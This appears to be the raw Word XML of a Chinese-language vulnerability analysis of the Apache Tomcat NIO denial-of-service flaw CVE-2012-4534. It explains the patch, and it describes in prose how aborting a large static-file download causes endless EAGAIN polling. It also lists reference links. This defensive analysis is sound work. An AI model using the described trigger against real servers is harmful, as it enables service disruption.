              <w:t xml:space="preserve">                     }</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00F23FF0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>补丁中只是简单地去掉了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>if(reg)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE7933">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和增加了一些调试打印信息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buffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中仍然有数据的情况下设置为</w:t>
      </w:r>
      <w:r>
        <w:t>OP_READ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。防止又去</w:t>
      </w:r>
      <w:r w:rsidRPr="00C56543">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OP_WRITE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>造成持续轮询消耗系统资源。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00F23FF0"/>
    <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00F23FF0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>总结</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="009A2B21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>经过请求下载较大的静态文件并中间终止连接，此时</w:t>
      </w:r>
      <w:r w:rsidRPr="00C56543">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>channel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的数据仍然</w:t>
      </w:r>
      <w:r w:rsidRPr="00C56543">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>往</w:t>
      </w:r>
      <w:r w:rsidRPr="00845335">
        <w:t>socket descriptor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>写并</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>EAGAIN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>失败，然后又继续去请求</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>EPOLLIN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，又尝试写，又</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>EAGAIN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，持续轮询，消耗系统资源，从而导致拒绝服务</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23FF0" w:rsidRPr="00D012B6" w:rsidRDefault="00F23FF0" w:rsidP="00F23FF0"/>
    <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00F23FF0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>备注</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00F23FF0">
      <w:r w:rsidRPr="00C56543">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SelectionKey</w:t>
      </w:r>
      <w:r w:rsidRPr="00C56543">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:r w:rsidRPr="00C56543">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>operation</w:t>
      </w:r>
      <w:r w:rsidRPr="00C56543">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有四种：</w:t>
      </w:r>
      <w:r w:rsidRPr="00C56543">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OP_READ, OP_WRITE, OP_CONNECT, OP_ACCEPT</w:t>
      </w:r>
      <w:r w:rsidRPr="00C56543">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。这些状态是由主线程告诉给操作系统要进行操作了。例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00C56543">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>reg(sk,attachment,SelectionKey.OP_READ)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C56543">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这个意思就是告诉操作系统要去</w:t>
      </w:r>
      <w:r w:rsidRPr="00C56543">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>socket</w:t>
      </w:r>
      <w:r w:rsidRPr="00C56543">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>读取数据了，把读入的数据放入到</w:t>
      </w:r>
      <w:r w:rsidRPr="00C56543">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>channel</w:t>
      </w:r>
      <w:r w:rsidRPr="00C56543">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中；</w:t>
      </w:r>
      <w:r w:rsidRPr="00C56543">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>reg(sk,attachment,SelectionKey.OP_WRITE)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C56543">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，就是告诉操作系统现在</w:t>
      </w:r>
      <w:r w:rsidRPr="00C56543">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>channel</w:t>
      </w:r>
      <w:r w:rsidRPr="00C56543">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的数据都已经准备好了，现在可以往客户端写了；同理，</w:t>
      </w:r>
      <w:r w:rsidRPr="00C56543">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OP_CONNECT</w:t>
      </w:r>
      <w:r w:rsidRPr="00C56543">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00C56543">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OP_ACCEPT</w:t>
      </w:r>
      <w:r w:rsidRPr="00C56543">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分别表示结束连接和接受连接。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00F23FF0"/>
    <w:p w:rsidR="00A81C1D" w:rsidRDefault="00A81C1D" w:rsidP="00A81C1D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装说明</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A81C1D" w:rsidRDefault="00A81C1D" w:rsidP="00A81C1D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A81C1D" w:rsidRDefault="00A81C1D" w:rsidP="00A81C1D">
      <w:r>
        <w:t>http://annegu.iteye.com/blog/413048</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A81C1D" w:rsidRDefault="00A81C1D" w:rsidP="00A81C1D">
      <w:r>
        <w:t>http://blog.csdn.net/njchenyi/article/details/6639711</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A81C1D" w:rsidRDefault="00A81C1D" w:rsidP="00A81C1D">
      <w:r>
        <w:t xml:space="preserve">http://archboy.org/2012/02/19/arch-linux-tomcat-6-virtual-host-ssl-https-nio-apr/  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A81C1D" w:rsidRDefault="00A81C1D" w:rsidP="00A81C1D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一定要填写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>org.apache.coyote.http11.Http11NioProtocol</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A81C1D" w:rsidRDefault="00A81C1D" w:rsidP="00A81C1D">
      <w:r>
        <w:t>http://tomcat.apache.org/tomcat-7.0-doc/ssl-howto.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A81C1D" w:rsidRDefault="00A81C1D" w:rsidP="00A81C1D"/>
    <w:p w:rsidR="00A81C1D" w:rsidRDefault="00A81C1D" w:rsidP="00A81C1D"/>
    <w:p w:rsidR="00A81C1D" w:rsidRDefault="00A81C1D" w:rsidP="00A81C1D"/>
    <w:p w:rsidR="00A81C1D" w:rsidRDefault="00A81C1D" w:rsidP="00A81C1D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Apache Tomcat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拒绝服务漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(CVE-2012-4534)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A81C1D" w:rsidRDefault="00A81C1D" w:rsidP="00A81C1D">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>http://www.nsfocus.net/vulndb/21392</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A81C1D" w:rsidRDefault="00A81C1D" w:rsidP="00A81C1D">
      <w:r>
        <w:t>https://issues.apache.org/bugzilla/show_bug.cgi?id=52858</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A81C1D" w:rsidRDefault="00A81C1D" w:rsidP="00A81C1D">
      <w:r>
        <w:t>http://svn.apache.org/viewvc?view=rev&amp;rev=1340218</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A81C1D" w:rsidRDefault="00A81C1D" w:rsidP="00A81C1D">
      <w:r>
        <w:t>http://packetstormsecurity.org/files/118615/Apache-Tomcat-6.x-7.x-Denial-Of-Service.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A81C1D" w:rsidRDefault="00A81C1D" w:rsidP="00A81C1D"/>
    <w:p w:rsidR="00202434" w:rsidRPr="00F23FF0" w:rsidRDefault="00A81C1D" w:rsidP="00A81C1D">
      <w:r>
        <w:t>http://annegu.iteye.com/blog/413048</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00202434" w:rsidRPr="00F23FF0" w:rsidSect="00615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B9B" w:rsidRDefault="00A05B9B" w:rsidP="002316E6">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00A05B9B" w:rsidRDefault="00A05B9B" w:rsidP="00231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B9B" w:rsidRDefault="00A05B9B" w:rsidP="002316E6">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00A05B9B" w:rsidRDefault="00A05B9B" w:rsidP="002316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B3C91"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AF70E5CE"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="chineseCountingThousand"/>
      <w:pStyle w:val="1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-340" w:hanging="794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-227" w:hanging="90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-113" w:hanging="1021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0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13" w:hanging="1247"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlRestart w:val="1"/>
      <w:pStyle w:val="a"/>
      <w:isLgl/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="图 %1.%7 "/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="-1134" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlRestart w:val="1"/>
      <w:pStyle w:val="a0"/>
      <w:isLgl/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="表 %1.%8 "/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1277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1134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6E6"/>
    <w:rsid w:val="0014190E"/>
    <w:rsid w:val="00202434"/>
    <w:rsid w:val="002316E6"/>
    <w:rsid w:val="006D5DB7"/>
    <w:rsid w:val="007848D0"/>
    <w:rsid w:val="008A279F"/>
    <w:rsid w:val="009035EB"/>
    <w:rsid w:val="00A05B9B"/>
    <w:rsid w:val="00A81C1D"/>
    <w:rsid w:val="00F2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23F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1"/>
    <w:next w:val="a1"/>
    <w:link w:val="1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00F23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F23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rsid w:val="00F23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1"/>
    <w:next w:val="a1"/>
    <w:link w:val="4Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00F23F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rsid w:val="00231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2316E6"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a6">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="Char0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00231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semiHidden/>
    <w:rsid w:val="002316E6"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1">
    <w:name w:val="标题 1（绿盟科技）"/>
    <w:basedOn w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00F23FF0"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="48" w:space="1" w:color="auto"/>
      </w:pBdr>
      <w:spacing w:before="600" w:line="576" w:lineRule="auto"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="黑体" w:hAnsi="Arial"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="2">
    <w:name w:val="标题 2（绿盟科技）"/>
    <w:basedOn w:val="20"/>
    <w:next w:val="a1"/>
    <w:qFormat/>
    <w:rsid w:val="00F23FF0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:line="415" w:lineRule="auto"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="黑体" w:hAnsi="Arial" w:cs="Times New Roman"/>
      <w:bCs w:val="0"/>
      <w:kern w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="3">
    <w:name w:val="标题 3（绿盟科技）"/>
    <w:basedOn w:val="30"/>
    <w:next w:val="a1"/>
    <w:qFormat/>
    <w:rsid w:val="00F23FF0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="960"/>
      </w:tabs>
      <w:spacing w:line="415" w:lineRule="auto"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="黑体" w:hAnsi="Arial"/>
      <w:bCs w:val="0"/>
      <w:kern w:val="0"/>
      <w:sz w:val="30"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="4">
    <w:name w:val="标题 4（绿盟科技）"/>
    <w:basedOn w:val="40"/>
    <w:next w:val="a1"/>
    <w:qFormat/>
    <w:rsid w:val="00F23FF0"/>
    <w:pPr>
      <w:widowControl/>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:after="156"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="黑体" w:hAnsi="Arial" w:cs="Times New Roman"/>
      <w:bCs w:val="0"/>
      <w:kern w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="5">
    <w:name w:val="标题 5（有编号）（绿盟科技）"/>
    <w:basedOn w:val="a1"/>
    <w:next w:val="a1"/>
    <w:qFormat/>
    <w:rsid w:val="00F23FF0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="4"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="280" w:after="156" w:line="377" w:lineRule="auto"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="黑体" w:hAnsi="Arial"/>
      <w:b/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="6">
    <w:name w:val="标题 6（有编号）（绿盟科技）"/>
    <w:basedOn w:val="a1"/>
    <w:next w:val="a1"/>
    <w:qFormat/>
    <w:rsid w:val="00F23FF0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="5"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="64" w:line="319" w:lineRule="auto"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="黑体" w:hAnsi="Arial"/>
      <w:b/>
      <w:kern w:val="0"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="a">
    <w:name w:val="插图标注（绿盟科技）"/>
    <w:next w:val="a1"/>
    <w:rsid w:val="00F23FF0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="6"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:after="156"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
      <w:kern w:val="0"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="a0">
    <w:name w:val="表格标注（绿盟科技）"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a1"/>
    <w:rsid w:val="00F23FF0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="7"/>
      </w:numPr>
      <w:ind w:left="-1134"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="a7">
    <w:name w:val="Hyperlink"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F23FF0"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a8">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="Char1"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F23FF0"/>
    <w:pPr>
      <w:spacing w:after="120"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char1">
    <w:name w:val="正文文本 Char"/>
    <w:basedOn w:val="a2"/>
    <w:link w:val="a8"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00F23FF0"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a9">
    <w:name w:val="Body Text First Indent"/>
    <w:basedOn w:val="a8"/>
    <w:link w:val="Char2"/>
    <w:rsid w:val="00F23FF0"/>
    <w:pPr>
      <w:ind w:firstLineChars="100" w:firstLine="420"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char2">
    <w:name w:val="正文首行缩进 Char"/>
    <w:basedOn w:val="Char1"/>
    <w:link w:val="a9"/>
    <w:rsid w:val="00F23FF0"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="aa">
    <w:name w:val="Body Text Indent"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="Char3"/>
    <w:rsid w:val="00F23FF0"/>
    <w:pPr>
      <w:spacing w:after="120"/>
      <w:ind w:leftChars="200" w:left="420"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char3">
    <w:name w:val="正文文本缩进 Char"/>
    <w:basedOn w:val="a2"/>
    <w:link w:val="aa"/>
    <w:rsid w:val="00F23FF0"/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2"/>
    <w:link w:val="10"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00F23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F23F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0"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00F23FF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0"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00F23FF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ketstormsecurity.org/files/118615/Apache-Tomcat-6.x-7.x-Denial-Of-Servi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sues.apache.org/bugzilla/show_bug.cgi?id=528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ssues.apache.org/bugzilla/show_bug.cgi?id=528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1584</Words>
  <Characters>9029</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>75</Lines>
  <Paragraphs>21</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>nsfocus</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>10592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6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-12-08T11:58:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2012-12-08T12:01:00Z</dcterms:modified>
</cp:coreProperties>
</file>